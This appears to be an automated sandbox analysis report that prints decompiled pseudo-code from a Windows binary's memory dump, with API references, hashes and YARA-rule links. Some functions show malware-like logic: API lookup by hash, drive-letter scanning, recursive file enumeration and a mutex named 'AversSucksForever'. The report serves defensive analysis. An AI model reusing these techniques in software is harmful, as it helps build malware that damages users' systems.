								if(_t105 > _t82) {
									goto L14;
								} else {
									_t85 = _t82 - _t105 >> 2;
									E0040BCA0(_t85, _t109, _t124, _t115 - _t91);
									_t82 =  *_t109 + _t85 * 4;
								}
							}
							_v8 = 0;
							E0040C490(_t109,  *(_t109 + 4), _t115 - ( *(_t109 + 4) -  *_t109 >> 2), _t82);
							_v8 = 0xffffffff;
							_t61 =  *(_t109 + 4) -  *_t109 >> 2;
							_t43 = _t109 + 4;
							 *_t43 =  *(_t109 + 4) + (_t115 - _t61 << 2);
							__eflags =  *_t43;
							 *[fs:0x0] = _v16;
							return _t61;
						}
					} else {
						_t120 = _t115 - _t91;
						__eflags = _t120;
						_t52 = _t52 + _t120 * 4;
						 *(_t109 + 4) = _t52;
						L9:
						 *[fs:0x0] = _v16;
						return _t52;
					}
				} else {
					E0040E900(__ecx + 4,  &_v4, _t114);
					_t67 = _v4;
					if(_t67 ==  *((intOrPtr*)(__ecx + 8))) {
						_v16 = _t114;
						E004034A0(__ecx + 4, _t123,  &_v8, 0x4375cc,  &_v16,  &_a4);
						_t67 = _v24;
					}
					_push(_t123);
					_t127 =  *((intOrPtr*)(_t67 + 0x20));
					E0040DC10(_t80 + 4,  &_v16, _t114);
					_t121 = _v24;
					_t70 = _t121;
					_t107 = _v20;
					if(_t121 != _t107) {
						do {
							_t70 =  *_t70;
						} while (_t70 != _t107);
					}
					E0040DE90(_t80, _t127,  &_a4, _t121, _t107);
					_v24 = 0;
					_push( &_v28);
					_v28 = _t127;
					return L0040F890(_t80 + 0x28);
				}
			}

0x0040fb00
0x0040fb05
0x0040fb0e
0x0040fb12
0x0040fb15
0x0040fb25
0x0040fbc0
0x0040fbc8
0x0040fbcd
0x0040fbce
0x0040fbcf
0x0040fbd0
0x0040fbd1
0x0040fbd3
0x0040fbd5
0x0040fbe0
0x0040fbe1
0x0040fbeb
0x0040fbec
0x0040fbed
0x0040fbee
0x0040fbf1
0x0040fbf3
0x0040fbf6
0x0040fbf9
0x0040fbff
0x0040fc02
0x0040fc05
0x0040fc07
0x0040fc24
0x00000000
0x0040fc26
0x0040fc26
0x0040fc29
0x0040fc2b
0x0040fc49
0x0040fc4b
0x0040fc50
0x0040fc2d
0x0040fc2d
0x0040fc2f
0x00000000
0x0040fc31
0x0040fc33
0x0040fc3d
0x0040fc44
0x0040fc44
0x0040fc2f
0x0040fc55
0x0040fc6f
0x0040fc74
0x0040fc80
0x0040fc88
0x0040fc88
0x0040fc88
0x0040fc8e
0x0040fc9b
0x0040fc9b
0x0040fc09
0x0040fc09
0x0040fc09
0x0040fc0b
0x0040fc0e
0x0040fc11
0x0040fc14
0x0040fc21
0x0040fc21
0x0040fb2b
0x0040fb30
0x0040fb35
0x0040fb3c
0x0040fb42
0x0040fb59
0x0040fb5e
0x0040fb5e
0x0040fb62
0x0040fb63
0x0040fb6f
0x0040fb74
0x0040fb78
0x0040fb7a
0x0040fb80
0x0040fb82
0x0040fb82
0x0040fb84
0x0040fb82
0x0040fb92
0x0040fb9b
0x0040fba3
0x0040fba7
0x0040fbb7
0x0040fbb7

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040FBC8

Part of subcall function 00416C8D: KiUserExceptionDispatcher.NTDLL(?,?,0041371A,?,00000008,?,1FFFFFFF,?,?,?,?,0041371A,?,00447D68,?), ref: 00416CEC

Part of subcall function 0040FB00: __CxxThrowException@8.LIBVCRUNTIME ref: 0040F9CF
Part of subcall function 0040FB00: __CxxThrowException@8.LIBVCRUNTIME ref: 0040F9E6
Part of subcall function 0040FB00: __CxxThrowException@8.LIBVCRUNTIME ref: 0040FAFA

Strings

`zC, xrefs: 0040F9C6

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Exception@8Throw$DispatcherExceptionUser
String ID: `zC
API String ID: 4200477539-2375258980
Opcode ID: 7c9ecbc3f4bb8f77b699f0aa766c11f30cc318ca3308f9ab7419dfc1915629eb
Instruction ID: 4f58f0797891dcfca91c606a3533a55fb8ff3a3863ba86d1b6dc649a694682af
Opcode Fuzzy Hash: 7c9ecbc3f4bb8f77b699f0aa766c11f30cc318ca3308f9ab7419dfc1915629eb
Instruction Fuzzy Hash: B7212AB21042059FC710DF45C881D9BB7ECFF98314F44896AF999AB145D738EA09CBA6

Uniqueness

Uniqueness Score: 100.00%

Function 00401FB8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401FB8(char _a4) {
				char _v8;
				char _v36;
				void* __ebx;
				char _t13;
				intOrPtr _t14;
				intOrPtr _t15;
				char _t16;
				int _t18;
				intOrPtr _t23;
				char* _t25;
				intOrPtr* _t33;
				intOrPtr _t36;
				void* _t38;

				_t25 =  &_v36;
				_t13 = 0x41;
				do {
					 *_t25 = _t13;
					_t13 = _t13 + 1;
					_t25 = _t25 + 1;
				} while (_t13 <= 0x5a);
				_t36 = 0; // executed
				_t14 = E00404F8F(_t13); // executed
				if(_t14 > 1) {
					_t14 = _t14 - 1;
				}
				_t33 = _a4;
				 *_t33 = _t14; // executed
				_t15 = E0040C6BA(0x1b); // executed
				 *((intOrPtr*)(_t33 + 4)) = _t15;
				_t23 = _t36;
				_v8 = 0x5c3a41;
				do {
					_t16 =  *((intOrPtr*)(_t38 + _t23 - 0x20));
					_a4 = _t16;
					_v8 = _t16;
					E004010BB(_t23, 1, 0x399354ce);
					_t9 =  &_v8; // 0x5c3a41
					_t18 = GetDriveTypeA(_t9); // executed
					if(_t18 + 0xfffffffe <= 2) {
						_t36 = _t36 + 1;
						E0040C454( *((intOrPtr*)(_t33 + 4)), _a4);
					}
					_t23 = _t23 + 1;
				} while (_t23 < 0x19);
				 *((intOrPtr*)(_t33 + 8)) = _t36;
				return _t36;
			}

0x00401fbe
0x00401fc1
0x00401fc3
0x00401fc3
0x00401fc5
0x00401fc7
0x00401fc8
0x00401fcf
0x00401fd1
0x00401fd9
0x00401fdb
0x00401fdb
0x00401fdc
0x00401fe1
0x00401fe3
0x00401fe9
0x00401fec
0x00401fee
0x00401ff5
0x00401ff5
0x00402000
0x00402003
0x00402006
0x0040200d
0x00402011
0x00402019
0x0040201e
0x00402022
0x00402028
0x00402029
0x0040202a
0x0040202f
0x0040203a

APIs

Part of subcall function 00404F8F: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,00401FD6), ref: 00404FAB

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

GetDriveTypeA.KERNELBASE(A:\), ref: 00402011

Strings

A:\, xrefs: 0040200D, 00402010

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AllocDriveInfoLibraryLoadSystemTypeVirtual
String ID: A:\
API String ID: 1585330831-3379428675
Opcode ID: 55fc3ee5bc46e9b91acca3a3e54eb182d95a76d6a54dea8510bf64a6261ef06c
Instruction ID: 8c043c91938381f90e04eac05c1df7e60301e71bf804a37f7ec5027fdb2e57fb
Opcode Fuzzy Hash: 55fc3ee5bc46e9b91acca3a3e54eb182d95a76d6a54dea8510bf64a6261ef06c
Instruction Fuzzy Hash: 51016D31504259AFCB149FA999815DDBBA4FB09760F20413FF918E72C2C7398542D7D8

Uniqueness

Uniqueness Score: 8.94%

Function 00404FB4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
synchronizationUNIQUE

Download Yara Rule

C-Code - Quality: 34%

			E00404FB4(void* __eflags) {
				void* __ebx;
				intOrPtr* _t1;
				void* _t6;
				WCHAR* _t7;
				void* _t13;

				_t13 = 1;
				_t1 = E004010BB(_t6, 1, 0xae52c61f);
				_t7 = L"AversSucksForever";
				_push(_t7);
				_push(0);
				_push(0x100000);
				if( *_t1() != 0) {
					_t13 = 0;
				} else {
					E004010BB(_t7, 1, 0xbf78968a);
					CreateMutexW(0, 0, _t7); // executed
				}
				return _t13;
			}

0x00404fb8
0x00404fbf
0x00404fc6
0x00404fcb
0x00404fcc
0x00404fce
0x00404fd7
0x00404fef
0x00404fd9
0x00404fdf
0x00404feb
0x00404feb
0x00404ff5

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

CreateMutexW.KERNELBASE(00000000,00000000,AversSucksForever), ref: 00404FEB

Strings

AversSucksForever, xrefs: 00404FC6, 00404FCB, 00404FE6

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: CreateLibraryLoadMutex
String ID: AversSucksForever
API String ID: 427046056-1203342155
Opcode ID: ed92d2694a3fa18b229803fadffa8e328e66f1b56f4918c8ae7ee459f5c60185
Instruction ID: 68acb4191ef37349a181cbd8b78457bfbab20a9f32978b6217445eec2eb4bb1c
Opcode Fuzzy Hash: ed92d2694a3fa18b229803fadffa8e328e66f1b56f4918c8ae7ee459f5c60185
Instruction Fuzzy Hash: 23E0C26234D2313AF12421EA2C86F67528CCB89FE7F20012BFF00F56C19A895D4101FE

Uniqueness

Uniqueness Score: 100.00%

Function 00425FD4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00425FD4(signed int __ebx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _t3;
				void* _t10;
				signed char _t12;
				void* _t14;
				void* _t16;
				intOrPtr* _t18;
				void* _t27;

				_t16 = __edx;
				_t3 = E00425B20(0x21, "SystemFunction036", 0x43e7d4, "SystemFunction036"); // executed
				_t18 = _t3;
				if(_t18 == 0) {
					E0042156A(__ebx, _t14, _t16, _t18, _t27);
					asm("int3");
					_push(__ebx);
					_t12 = __ebx ^ __ebx;
					if(E0042C5C5(_t14) == 1 && E00425A23() != 0 && E00425A3D() != 0) {
						_t12 = _t12 + 1;
					}
					return _t12;
				} else {
					 *0x437268(_a4, _a8); // executed
					_t10 =  *_t18(); // executed
					return _t10;
				}
			}

0x00425fd4
0x00425feb
0x00425ff0
0x00425ff7
0x0042600e
0x00426013
0x00426016
0x00426017
0x00426021
0x00426035
0x00426035
0x0042603a
0x00425ff9
0x00426001
0x00426007
0x0042600b
0x0042600b

APIs

Part of subcall function 00425B20: GetProcAddress.KERNEL32(00000000,?,00000000,0041370C,?,?,00425DB1,00000006,FlsSetValue,0043E5F8,0043E600,00000000,?,00425341,00000005,000000FF), ref: 00425B6C
Part of subcall function 00425B20: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00425B79

SystemFunction036.ADVAPI32 ref: 00426007

Part of subcall function 0042156A: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00421586

Strings

SystemFunction036, xrefs: 00425FDA, 00425FE4

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: AddressFeatureFunction036PresentProcProcessorSystem__crt_fast_encode_pointer
String ID: SystemFunction036
API String ID: 138106953-2669272182
Opcode ID: e2de10104113f68fd819baa930a4e48dd1e0df3030fda1db724ee8d0aa497800
Instruction ID: b90bc602ef9ce6e1775339af71c175b232df5b20cfefbf1323fc9ce23491a44c
Opcode Fuzzy Hash: e2de10104113f68fd819baa930a4e48dd1e0df3030fda1db724ee8d0aa497800
Instruction Fuzzy Hash: 1FE0C2317412383786203693AC0AE9BBE05CB80BA0F511073BD0865AE2DAB98C5093D9

Uniqueness

Uniqueness Score: 8.94%

Function 00404F4F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23
UNIQUE

Download Yara Rule

C-Code - Quality: 75%

			E00404F4F(intOrPtr _a4, intOrPtr _a8) {
				WCHAR* _t3;
				void* _t6;
				void* _t7;
				void* _t8;
				WCHAR* _t9;

				_t3 = E0040C6BA(0x2000); // executed
				_t9 = _t3;
				_pop(_t7);
				if(_t9 != 0) {
					_push(_a4);
					wsprintfW(_t9, "%s\");
					E00408A8F(_t7, _t8, _t9, _a8, 0); // executed
					_t6 = E0040C6D1(_t9); // executed
					return _t6;
				}
				return _t3;
			}

0x00404f58
0x00404f5d
0x00404f5f
0x00404f62
0x00404f64
0x00404f6d
0x00404f79
0x00404f7f
0x00000000
0x00404f84
0x00404f89

APIs

Part of subcall function 0040C6BA: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

wsprintfW.USER32 ref: 00404F6D

Part of subcall function 00408A8F: lstrlenW.KERNEL32(?,00000000,00000000,00000000), ref: 00408AFC
Part of subcall function 00408A8F: FindFirstFileExW.KERNELBASE(?,00000001,?,00000000,00000000,00000002), ref: 00408B39
Part of subcall function 00408A8F: FindFirstFileW.KERNELBASE(?,?), ref: 00408B58
Part of subcall function 00408A8F: FindNextFileW.KERNELBASE(00000000,?), ref: 00408CAA
Part of subcall function 00408A8F: CloseHandle.KERNEL32(00000000), ref: 00408CBE

Part of subcall function 0040C6D1: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Strings

%s\, xrefs: 00404F67

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: FileFind$FirstVirtual$AllocCloseFreeHandleNextlstrlenwsprintf
String ID: %s\
API String ID: 609015586-2802346739
Opcode ID: 334b6af234d2155914d21ee567b772a38a891ee7f2a2184a7f5a42a2d3f55a2c
Instruction ID: 8bea482edaef3cc2c1c5c75426d82c38647922dcfd6a247939218f94ffcb79ea
Opcode Fuzzy Hash: 334b6af234d2155914d21ee567b772a38a891ee7f2a2184a7f5a42a2d3f55a2c
Instruction Fuzzy Hash: 24D0C232A4262477D62137915C06FDEBA098F06770F04422BFF08391D29A7A091042ED

Uniqueness

Uniqueness Score: 23.02%

Function 00425CD8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00425CD8(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t7;

				_t2 = E00425B20(3, "FlsAlloc", 0x43e5e0, 0x43e5e8); // executed
				_t7 = _t2;
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0x437268(_a4);
				return  *_t7();
			}

0x00425cef
0x00425cf4
0x00425cfb
0x00000000
0x00425d0c
0x00425d02
0x00000000

APIs

Part of subcall function 00425B20: GetProcAddress.KERNEL32(00000000,?,00000000,0041370C,?,?,00425DB1,00000006,FlsSetValue,0043E5F8,0043E600,00000000,?,00425341,00000005,000000FF), ref: 00425B6C
Part of subcall function 00425B20: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00425B79

TlsAlloc.KERNEL32 ref: 00425D0C

Strings

FlsAlloc, xrefs: 00425CE8

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: AddressAllocProc__crt_fast_encode_pointer
String ID: FlsAlloc
API String ID: 1754766356-671089009
Opcode ID: 5bf7b52a9035d6da62996c6e90be7de04acffa0db1d88b73295c312451715eea
Instruction ID: 0bf3cccd3a13974d3e05839888c2c9bfa5e263b8ef4f6910b13bd3fe1ef2280c
Opcode Fuzzy Hash: 5bf7b52a9035d6da62996c6e90be7de04acffa0db1d88b73295c312451715eea
Instruction Fuzzy Hash: C7E0C23278563873D62232D27C0AB9FBE088BA4BA0F545027F90452390A9B94A0196DD

Uniqueness

Uniqueness Score: 0.09%

Function 00419FE4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00419FE4(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00419EC3(4, "FlsAlloc", 0x43b5c0, 0x43b5c8); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L00415A98();
				return  *_t6(_a4);
			}

0x00419ff9
0x00419ffe
0x0041a005
0x0041a018
0x0041a018
0x0041a00c
0x0041a015

APIs

try_get_function.LIBVCRUNTIME ref: 00419FF9

Part of subcall function 00419EC3: try_get_module.LIBVCRUNTIME ref: 00419F05
Part of subcall function 00419EC3: GetProcAddress.KERNEL32(00000000,?,0044DB70,00000000,?,?,0041A0E9,00000008,InitializeCriticalSectionEx,0043B5E0,0043B5E8,00000000,?,0041A36E,0044DB70,00000FA0), ref: 00419F27
Part of subcall function 00419EC3: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00419F34

Strings

FlsAlloc, xrefs: 00419FF2

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: AddressProc__crt_fast_encode_pointertry_get_functiontry_get_module
String ID: FlsAlloc
API String ID: 3143584871-671089009
Opcode ID: 043446a17e697fd899112b6824b743bd8a8e9b11752612ecbe29f29891e94f9d
Instruction ID: f2e230900ccef7504f326165a458aabae8ec99c5d01848b1e7707c6ad275b222
Opcode Fuzzy Hash: 043446a17e697fd899112b6824b743bd8a8e9b11752612ecbe29f29891e94f9d
Instruction Fuzzy Hash: 15D02B32BC573872852136D55C02BEDBA45CF04BF6F041063FB0811381D69D4A5006CD

Uniqueness

Uniqueness Score: 0.79%

Function 0042D25A, Relevance: 3.2, APIs: 2, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0042D25A(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __edi;
				signed int _t51;
				signed int _t55;
				int _t56;
				signed int _t59;
				signed int _t60;
				short _t63;
				signed char _t65;
				signed int _t66;
				signed char* _t74;
				signed char* _t75;
				int _t78;
				signed int _t84;
				signed char* _t85;
				short* _t86;
				signed int _t87;
				signed char _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t91;
				signed int _t92;
				short _t95;
				signed int _t96;
				intOrPtr _t100;
				signed int _t102;

				_t51 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t51 ^ _t102;
				_t100 = _a8;
				_t78 = E0042CDF3(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E0042CE66(_t100);
					goto L37;
				} else {
					_t95 = 0;
					_t84 = 0;
					_t56 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t56 + 0x44be08)) != _t78) {
						_t84 = _t84 + 1;
						_t56 = _t56 + 0x30;
						_v32 = _t84;
						if(_t56 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t56 | 0xffffffff;
							} else {
								_t56 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t56 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t56 = GetCPInfo(_t78,  &_v28);
										__eflags = _t56;
										if(_t56 == 0) {
											__eflags =  *0x44e288 - _t95; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											_t14 = _t100 + 0x18; // 0x426973
											E00417660(_t95, _t14, _t95, 0x101);
											 *(_t100 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t100 + 0x21c)) = _t95;
											if(_v28 == 2) {
												__eflags = _v22;
												_t74 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t74[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L18;
														}
														_t92 = _t88 & 0x000000ff;
														_t89 =  *_t74 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t92;
															if(_t89 > _t92) {
																break;
															}
															 *(_t100 + _t89 + 0x19) =  *(_t100 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t74 =  &(_t74[2]);
														__eflags =  *_t74;
														if( *_t74 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t25 = _t100 + 0x1a; // 0x426975
												_t75 = _t25;
												_t87 = 0xfe;
												do {
													 *_t75 =  *_t75 | 0x00000008;
													_t75 =  &(_t75[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												_t26 = _t100 + 4; // 0xc033a47d
												 *((intOrPtr*)(_t100 + 0x21c)) = E0042CDB5( *_t26);
												_t95 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t100 + 4) = 0xfde9;
										 *((intOrPtr*)(_t100 + 0x21c)) = _t95;
										 *((intOrPtr*)(_t100 + 0x18)) = _t95;
										 *((short*)(_t100 + 0x1c)) = _t95;
										L8:
										 *((intOrPtr*)(_t100 + 8)) = _t95;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E0042CECB(_t100); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					_t28 = _t100 + 0x18; // 0x426973
					E00417660(_t95, _t28, _t95, 0x101);
					_t59 = _v32 * 0x30;
					__eflags = _t59;
					_v36 = _t59;
					_t60 = _t59 + 0x44be18;
					_v32 = _t60;
					do {
						__eflags =  *_t60;
						_t85 = _t60;
						if( *_t60 != 0) {
							while(1) {
								_t65 = _t85[1];
								__eflags = _t65;
								if(_t65 == 0) {
									break;
								}
								_t91 =  *_t85 & 0x000000ff;
								_t66 = _t65 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t66;
									if(_t91 > _t66) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t95 + 0x44be00; // 0x8040201
										 *(_t100 + _t91 + 0x19) =  *(_t100 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t66 = _t85[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t85 =  &(_t85[2]);
								__eflags =  *_t85;
								if( *_t85 != 0) {
									continue;
								}
								break;
							}
							_t60 = _v32;
						}
						_t95 = _t95 + 1;
						_t60 = _t60 + 8;
						_v32 = _t60;
						__eflags = _t95 - 4;
					} while (_t95 < 4);
					 *(_t100 + 4) = _t78;
					 *((intOrPtr*)(_t100 + 8)) = 1;
					 *((intOrPtr*)(_t100 + 0x21c)) = E0042CDB5(_t78);
					_t46 = _t100 + 0xc; // 0x426967
					_t86 = _t46;
					_t90 = _v36 + 0x44be0c;
					_t96 = 6;
					do {
						_t63 =  *_t90;
						_t90 = _t90 + 2;
						 *_t86 = _t63;
						_t49 = _t86 + 2; // 0x8babab84
						_t86 = _t49;
						_t96 = _t96 - 1;
						__eflags = _t96;
					} while (_t96 != 0);
					goto L9;
				}
				L38:
				E00415A87();
				return _t55;
			}

0x0042d262
0x0042d269
0x0042d26e
0x0042d27a
0x0042d27f
0x0042d435
0x0042d436
0x00000000
0x0042d285
0x0042d285
0x0042d287
0x0042d289
0x0042d28b
0x0042d28e
0x0042d29a
0x0042d29b
0x0042d29e
0x0042d2a6
0x00000000
0x0042d2a8
0x0042d2ae
0x0042d385
0x0042d385
0x0042d2b4
0x0042d2b8
0x0042d2c0
0x00000000
0x0042d2c6
0x0042d2cd
0x0042d2fa
0x0042d300
0x0042d302
0x0042d379
0x0042d37f
0x00000000
0x00000000
0x00000000
0x00000000
0x0042d304
0x0042d309
0x0042d30e
0x0042d316
0x0042d319
0x0042d31d
0x0042d323
0x0042d325
0x0042d329
0x0042d32c
0x0042d32e
0x0042d32e
0x0042d331
0x0042d333
0x00000000
0x00000000
0x0042d335
0x0042d338
0x0042d343
0x0042d343
0x0042d345
0x00000000
0x00000000
0x0042d33d
0x0042d342
0x0042d342
0x0042d342
0x0042d347
0x0042d34a
0x0042d34d
0x00000000
0x00000000
0x00000000
0x0042d34d
0x0042d32e
0x0042d34f
0x0042d34f
0x0042d34f
0x0042d352
0x0042d357
0x0042d357
0x0042d35a
0x0042d35b
0x0042d35b
0x0042d35b
0x0042d360
0x0042d36a
0x0042d373
0x0042d373
0x00000000
0x0042d323
0x0042d2cf
0x0042d2cf
0x0042d2d2
0x0042d2d8
0x0042d2db
0x0042d2df
0x0042d2df
0x0042d2e7
0x0042d2e8
0x0042d2e9
0x0042d2ea
0x0042d2eb
0x0042d43b
0x0042d43b
0x0042d43d
0x0042d2cd
0x0042d2c0
0x0042d2ae
0x00000000
0x0042d2a6
0x0042d392
0x0042d397
0x0042d39f
0x0042d39f
0x0042d3a3
0x0042d3a6
0x0042d3ac
0x0042d3af
0x0042d3af
0x0042d3b2
0x0042d3b4
0x0042d3b6
0x0042d3b6
0x0042d3b9
0x0042d3bb
0x00000000
0x00000000
0x0042d3bd
0x0042d3c0
0x0042d3dc
0x0042d3dc
0x0042d3de
0x00000000
0x00000000
0x0042d3c5
0x0042d3cb
0x0042d3cd
0x0042d3d3
0x0042d3d7
0x0042d3d7
0x0042d3d8
0x00000000
0x0042d3d8
0x00000000
0x0042d3cb
0x0042d3e0
0x0042d3e3
0x0042d3e6
0x00000000
0x00000000
0x00000000
0x0042d3e6
0x0042d3e8
0x0042d3e8
0x0042d3eb
0x0042d3ec
0x0042d3ef
0x0042d3f2
0x0042d3f2
0x0042d3f8
0x0042d3fb
0x0042d40a
0x0042d413
0x0042d413
0x0042d418
0x0042d41e
0x0042d41f
0x0042d41f
0x0042d422
0x0042d425
0x0042d428
0x0042d428
0x0042d42b
0x0042d42b
0x0042d42b
0x00000000
0x0042d430
0x0042d43e
0x0042d446
0x0042d44e

APIs

Part of subcall function 0042CDF3: GetOEMCP.KERNEL32(00000000,0042D069,0042695B,00000000,0041C230,0041C230,00000000,?,0042695B), ref: 0042CE1E
Part of subcall function 0042CDF3: GetACP.KERNEL32(00000000,0042D069,0042695B,00000000,0041C230,0041C230,00000000,?,0042695B), ref: 0042CE35

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0042D0B0,?,00000000,0042695B,558B0000,?,?,?,?,0041C230), ref: 0042D2B8

Part of subcall function 0042CECB: GetCPInfo.KERNEL32(E8458D00,?,00426967,0042695B,00000000), ref: 0042CEFD

GetCPInfo.KERNEL32(00000000,0042D0B0,?,?,0042D0B0,?,00000000,0042695B,558B0000,?,?,?,?,0041C230,00000000), ref: 0042D2FA

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Info$CodeFeaturePagePresentProcessorValid___raise_securityfailure
String ID:
API String ID: 3308807869-0
Opcode ID: 371c9f3517e04325da3ef73c8bd6ee5ea8e6658fe9aeec0455d0ac67d9139bcd
